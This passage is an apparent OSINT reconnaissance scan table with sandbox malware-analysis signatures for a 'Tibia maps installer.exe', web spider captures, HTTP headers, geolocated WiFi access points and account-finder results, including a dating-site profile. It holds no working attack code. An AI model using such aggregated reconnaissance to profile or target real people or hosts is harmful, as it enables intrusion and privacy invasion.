Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string "<a href="https://www.netflix.com/" class="btn btn-rounded">Sign In</a>" (Indicator: "dir "; File: "netflix-clone_1_.htm")\n Found string "<a href="https://www.netflix.com/" class="btn btn-xl"" (Indicator: "dir "; File: "netflix-clone_1_.htm")\n Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "netflix-clone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar77B.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "netflix-fav_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62) quality = 82" baseline precision 8 900x900 components 3" and extension "jpg"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1560', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1560', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab76A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab76A.tmp]- [targetUID: 00000000-00001884]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar77B.tmp" has type "data"- Location: [%TEMP%\\Tar77B.tmp]- [targetUID: 00000000-00001884]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Cab76A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab76A.tmp]- [targetUID: 00000000-00001884]\n "Cab6E9.tmp" has type "data"- Location: [%TEMP%\\Cab6E9.tmp]- [targetUID: 00000000-00001884]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001884]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "netflix-fav_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62) quality = 82" baseline precision 8 900x900 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003000]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFDD7E91FED3593DEC.TMP" has type "data"- Location: [%TEMP%\\~DFDD7E91FED3593DEC.TMP]- [targetUID: 00000000-00003000]\n "~DF54A0D439AE08C5A5.TMP" has type "data"- Location: [%TEMP%\\~DF54A0D439AE08C5A5.TMP]- [targetUID: 00000000-00003000]\n "~DF9E21D26384C65AFE.TMP" has type "data"- Location: [%TEMP%\\~DF9E21D26384C65AFE.TMP]- [targetUID: 00000000-00003000]\n "~DF249C4A46112B4859.TMP" has type "data"- Location: [%TEMP%\\~DF249C4A46112B4859.TMP]- [targetUID: 00000000-00003000]\n "urlref_httpsthedude23.github.ionetflix-clone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "RecoveryStore._D375E0FF-EF98-11ED-98AF-080027A7DD56_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D375E101-EF98-11ED-98AF-080027A7DD56_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_DDEB9FEC-EF98-11ED-98AF-080027A7DD56_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001884]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "LEMAY786.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LEMAY786.txt]- [targetUID: 00000000-00001884]\n "KJPXKWFZ.txt" | 185.199.108.153 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.78): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:12 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.125): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Connectionpoint (Net ID: 00:01:E3:52:11:50) | 50.1188, 8.6843 |
| 2023-05-12 03:32:02 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.2:80 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Web Content | No | Web Spider | 3 | 0 | 2 | 0 | None | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
| nuke.battleb0t.xyz |
| 2023-05-12 02:53:56 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8001::153:443 | 2606:50c0:8001::153 |
| 2023-05-12 02:54:07 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:44:15 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | FriendFinder-X (Category: dating)
https://www.friendfinder-x.com/profile/Altpapier | Altpapier |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:8080 | 188.114.96.0/24 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-oo2.github.io |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000panther.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-cache-status: DYNAMIC | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:92:0E:CC) | 41.8781, -87.6298 |
| 2023-05-12 02:45:50 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:19 | Web Content | No | Web Spider | 3 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> | fluid.battleb0t.xyz |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00steveng.github.io | 185.199.111.153 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c57f0d8baaf3a64-FRA
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:02:26 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | www.ayhu.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:0C:05) | 50.8897, 6.0563 |
| 2023-05-12 03:23:02 | Username | No | Account Finder | 8 | 0 | 7 | 0 | None | baptistevauthey | baptiste vauthey |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 000.ovh | 000.ovh |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | freesound (Category: music)
https://freesound.org/people/login/ | login |
| 2023-05-12 02:53:49 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["A5D4:2C9F:2F6913:34928C:645D0975"], "Etag": ["W/\"64556a8c-239b\""], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683818869.392299,VS0,VE127"], "Connection": ["keep-alive"], "Via": ["1.1 varnish"], "X_Fastly_Request_Id": ["770beefb8a8eea06db7f3e4b2376459b2d1c2cbe"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-gig2250052-GIG"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8000::153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.231): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:DB:1C:01) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': 4, u'submit_name': u'Tibia maps installer.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-122', u'name': u'Calls an API typically used to create a directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1074/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1074.001', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %TEMP%\\ (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter C:\\Users (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %USERPROFILE%\\AppData (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %LOCALAPPDATA%\\Temp (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %TEMP%\\nsaFA07.tmp (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" (UID: 00000000-00002964)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-70', u'name': u'Scanning for window 